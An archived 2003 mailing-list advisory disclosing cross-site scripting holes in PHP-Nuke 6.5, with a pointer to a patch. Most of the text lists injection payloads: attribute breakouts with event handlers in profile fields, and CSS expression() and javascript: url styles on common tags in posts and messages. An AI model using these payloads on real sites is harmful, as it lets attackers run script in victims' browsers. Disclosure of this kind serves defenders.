Informations : °°°°°°°°°°°°°° Language : PHP Website : http://www.phpnuke.org Tested Version : 6.5 FINAL Problem : Cross Site Scripting Exploit : °°°°°°°°° In the website or the email of the profil : - http://" onclick="[SCRIPT] (onclick can be replaced by ondblclick, onhelp, onmouseout, onmousemove,...) - " style="list-style:url(javascript:[SCRIPT]); visibility:hidden; - " style="zoom:expression([SCRIPT]); visibility:hidden; etc... In private messages (not with phpBB), comments, news, forums,... : <i style="overflow:expression([SCRIPT]);"></i> <br style="overflow:expression([SCRIPT]);"> <a style="left:expression([SCRIPT]);"></a> <a style="background:url('javascript:[SCRIPT]');"></a> <li style="list-style-image:url('javascript:[SCRIPT]');"> <b style="background:url('javascript:[SCRIPT]');"></b> etc... with : - <b> - <i> - <a> - <em> - <br> - <strong> - <blockquote> - <tt> - <li> - <ol> - <ul> Patch : °°°°°°° A patch can be found on http://www.phpsecure.info More Details In French : °°°°°°°°°°°°°°°°°°°°°°°° http://www.frog-man.org/tutos/PHP-Nuke-html.txt frog-m@n _________________________________________________________________
This archive was generated by hypermail 2b30 : Thu Apr 24 2003 - 16:05:42 PDT